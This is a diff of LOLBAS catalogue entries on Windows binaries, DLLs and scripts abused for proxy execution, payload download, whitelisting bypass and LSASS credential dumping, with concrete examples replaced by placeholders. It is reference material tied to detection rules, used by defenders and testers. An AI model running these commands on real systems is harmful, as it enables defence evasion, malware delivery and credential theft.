@@ -34,8 +34,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index b6204bf..98eccc4 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml 
@@ -6,21 +6,14 @@ Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: - - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe http://example.com/test.zip" + - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe {REMOTEURL:.zip}" Description: msedge_proxy will download malicious file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\\\\Desktop\\\\test.json &&\"" - Description: Edge will silently download the file. - Usecase: Download file from the internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 10, Windows 11 - - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c ping google.com &&\"" + - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"" Description: msedge_proxy.exe will execute file in the background Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index a71093b..cd61d40 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml 
@@ -4,8 +4,8 @@ Description: msedgewebview2.exe is the executable file for Microsoft Edge WebVie Author: Matan Bahar Created: 2023-06-15 Commands: - - Command: msedgewebview2.exe --no-sandbox --browser-subprocess-path="C:\Windows\System32\calc.exe" - Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. + - Command: msedgewebview2.exe --no-sandbox --browser-subprocess-path="{PATH_ABSOLUTE:.exe}" + Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified executable as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: Low privileges @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" - Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. + - Command: msedgewebview2.exe --utility-cmd-prefix="{CMD}" + Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: User @@ -22,8 +22,8 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" - Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. + - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="{CMD}" + Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: User 
@@ -31,8 +31,8 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" - Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. + - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="{CMD}" + Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: User diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index b83e0e7..e6249e9 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -4,8 +4,8 @@ Description: Windows Terminal Author: Nasreddine Bencherchali Created: 2022-07-27 Commands: - - Command: wt.exe calc.exe - Description: Execute calc.exe via Windows Terminal. + - Command: wt.exe {CMD} + Description: Execute a command via Windows Terminal. Usecase: Use wt.exe as a proxy binary to evade defensive counter-measures Category: Execute Privileges: User diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index f445a41..96dfe94 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -4,7 +4,7 @@ Description: Utility for installing software and drivers with rundll32.exe Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, + - Command: rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass 
@@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, + - Command: rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - - Command: rundll32.exe advpack.dll,RegisterOCX test.dll + - Command: rundll32.exe advpack.dll,RegisterOCX {PATH:.dll} Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute @@ -31,7 +31,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe + - Command: rundll32.exe advpack.dll,RegisterOCX {PATH:.exe} Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute @@ -40,7 +40,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" + - Command: rundll32 advpack.dll, RegisterOCX {CMD} Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml index 935a6f5..d229b16 100644 --- a/yml/OSLibraries/Desk.yml +++ b/yml/OSLibraries/Desk.yml 
@@ -4,7 +4,7 @@ Description: Desktop Settings Control Panel Author: Hai Vaknin Created: 2022-04-21 Commands: - - Command: rundll32.exe desk.cpl,InstallScreenSaver C:\temp\file.scr + - Command: rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr} Description: Launch an executable with a .scr extension by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr + - Command: rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr} Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. Category: Execute diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index 3796255..f7c0a06 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -1,11 +1,11 @@ --- Name: Dfshim.dll Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL} + Description: Executes click-once-application from URL (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting Category: AWL Bypass Privileges: User 
@@ -19,8 +19,6 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index bda0f4c..cebde4a 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -4,7 +4,7 @@ Description: INF installer for Internet Explorer. Has much of the same functiona Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, + - Command: rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, + - Command: rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass 
@@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll + - Command: rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.dll} Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute @@ -31,7 +31,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe + - Command: rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.exe} Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute @@ -40,7 +40,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" + - Command: rundll32 ieadvpack.dll, RegisterOCX {CMD} Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index e75c0a6..0aae8f1 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -4,9 +4,9 @@ Description: Internet Browser DLL for translating HTML code. Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" + - Command: rundll32.exe ieframe.dll,OpenURL {PATH_ABSOLUTE:.url} Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index a7701fe..5b4392d 100644 --- a/yml/OSLibraries/Mshtml.yml 
+++ b/yml/OSLibraries/Mshtml.yml @@ -4,7 +4,7 @@ Description: Microsoft HTML Viewer Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" + - Command: rundll32.exe Mshtml.dll,PrintHTML {PATH_ABSOLUTE:.hta} Description: "Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box)." Usecase: Launch an HTA application. Category: Execute @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: c:\windows\system32\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 407d41c..3ae7f0f 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -4,7 +4,7 @@ Description: Microsoft HTML Viewer Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe + - Command: rundll32.exe pcwutl.dll,LaunchApplication {PATH:.exe} Description: Launch executable by calling the LaunchApplication function. Usecase: Launch an executable. Category: Execute @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll -Code_Sample: - - Code: Detection: - Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/ - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml diff --git a/yml/OSLibraries/Scrobj.yml b/yml/OSLibraries/Scrobj.yml index 405546f..838d76a 100644 --- a/yml/OSLibraries/Scrobj.yml +++ b/yml/OSLibraries/Scrobj.yml 
@@ -4,8 +4,8 @@ Description: Windows Script Component Runtime Author: Eral4m Created: 2021-01-07 Commands: - - Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib http://x.x.x.x/payload.exe - Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\\payload[1].exe. + - Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe} + Description: Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache. Usecase: Download file from remote location. Category: Download Privileges: User diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index b6836b6..c4a41d3 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -4,7 +4,7 @@ Description: Windows Setup Application Programming Interface Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Usecase: Load an executable payload. Category: Execute diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 52e973e..cf11679 100644 --- a/yml/OSLibraries/Shdocvw.yml 
+++ b/yml/OSLibraries/Shdocvw.yml @@ -4,7 +4,7 @@ Description: Shell Doc Object and Control Library. Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" + - Command: rundll32.exe shdocvw.dll,OpenURL {PATH_ABSOLUTE:.url} Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 4848867..69d05f2 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -4,7 +4,7 @@ Description: Windows Shell Common Dll Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll + - Command: rundll32.exe shell32.dll,Control_RunDLL {PATH_ABSOLUTE:.dll} Description: Launch a DLL payload by calling the Control_RunDLL function. Usecase: Load a DLL payload. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe + - Command: rundll32.exe shell32.dll,ShellExec_RunDLL {PATH:.exe} Description: Launch an executable by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" + - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL {PATH:.exe} {CMD:args} Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute 
@@ -34,8 +34,6 @@ Commands: Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml diff --git a/yml/OSLibraries/Shimgvw.yml b/yml/OSLibraries/Shimgvw.yml index 257816c..d878a09 100644 --- a/yml/OSLibraries/Shimgvw.yml +++ b/yml/OSLibraries/Shimgvw.yml @@ -4,7 +4,7 @@ Description: Photo Gallery Viewer Author: Eral4m Created: 2021-01-06 Commands: - - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe + - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe} Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'. Usecase: Download file from remote location. Category: Download diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 3b01659..720d513 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -4,7 +4,7 @@ Description: Windows NT System Setup Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf + - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window). Category: AWL Bypass 
@@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf + - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Usecase: Load an executable payload. Category: Execute diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 608f69d..2332197 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -4,7 +4,7 @@ Description: Internet Shortcut Shell Extension DLL. Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" + - Command: rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta} Description: Launch a HTML application payload by calling OpenURL. Usecase: Invoke an HTML Application via mshta.exe (Default Handler). Category: Execute @@ -13,9 +13,9 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: HTA - - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - Usecase: Load an executable payload by calling a .url file with or without quotes. + - Command: rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url} + Description: Launch an executable payload via proxy through a .url (information) file by calling OpenURL. + Usecase: Load an executable payload by calling a .url file. Category: Execute Privileges: User MitreID: T1218.011 @@ -31,7 +31,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe + - Command: rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe} Description: Launch an executable by calling FileProtocolHandler. Usecase: Launch an executable. Category: Execute 
@@ -61,8 +61,6 @@ Commands: Full_Path: - Path: c:\windows\system32\url.dll - Path: c:\windows\syswow64\url.dll -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index a7c1355..8cd8745 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -4,7 +4,7 @@ Description: Compressed Folder library Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe + - Command: rundll32.exe zipfldr.dll,RouteTheCall {PATH:.exe} Description: Launch an executable payload by calling RouteTheCall. Usecase: Launch an executable. Category: Execute diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index 7b60af7..caabccb 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml @@ -4,7 +4,7 @@ Description: COM+ Services Author: LOLBAS Team Created: 2019-08-30 Commands: - - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full + - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin full Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. Usecase: Dump Lsass.exe process memory to retrieve credentials. Category: Dump @@ -24,4 +24,3 @@ Resources: - Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ Acknowledgement: - Person: modexp - Handle: diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index a57f1b9..8b78eb0 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml 
@@ -15,8 +15,6 @@ Commands: - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml Resources: diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index b23da74..58b32e9 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -1,10 +1,10 @@ --- Name: CL_Mutexverifiers.ps1 Description: Proxy execution with CL_Mutexverifiers.ps1 -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 + - Command: . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess {PATH:.ps1} Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. Usecase: Proxy execution Category: Execute @@ -19,8 +19,6 @@ Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1 -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml Resources: diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 963cf0b..caf3f20 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml 
@@ -1,10 +1,10 @@ --- Name: CL_Invocation.ps1 Description: Aero diagnostics script -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke [args] + - Command: . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke {CMD} Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. Usecase: Proxy execution Category: Execute @@ -17,8 +17,6 @@ Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml diff --git a/yml/OSScripts/Launch-VsDevShell.yml b/yml/OSScripts/Launch-VsDevShell.yml index 72d32fb..072279a 100644 --- a/yml/OSScripts/Launch-VsDevShell.yml +++ b/yml/OSScripts/Launch-VsDevShell.yml @@ -4,7 +4,7 @@ Description: Locates and imports a Developer PowerShell module and calls the Ent Author: 'Nasreddine Bencherchali' Created: 2022-06-13 Commands: - - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsWherePath "C:\windows\system32\calc.exe"' + - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsWherePath {PATH_ABSOLUTE:.exe}' Description: Execute binaries from the context of the signed script using the "VsWherePath" flag. Usecase: Proxy execution Category: Execute 
@@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; calc.exe ;"' + - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; {PATH:.exe} ;"' Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag. Usecase: Proxy execution Category: Execute diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index 4b1441c..3678db6 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -1,10 +1,10 @@ --- Name: Manage-bde.wsf Description: Script for managing BitLocker -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf + - Command: set comspec={PATH_ABSOLUTE:.exe} & cscript c:\windows\system32\manage-bde.wsf Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. Usecase: Proxy execution from script Category: Execute @@ -24,8 +24,6 @@ Commands: - Execute: EXE Full_Path: - Path: C:\Windows\System32\manage-bde.wsf -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml - IOC: Manage-bde.wsf should not be invoked by a standard user under normal situations diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index 18985ac..8714a3a 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml 
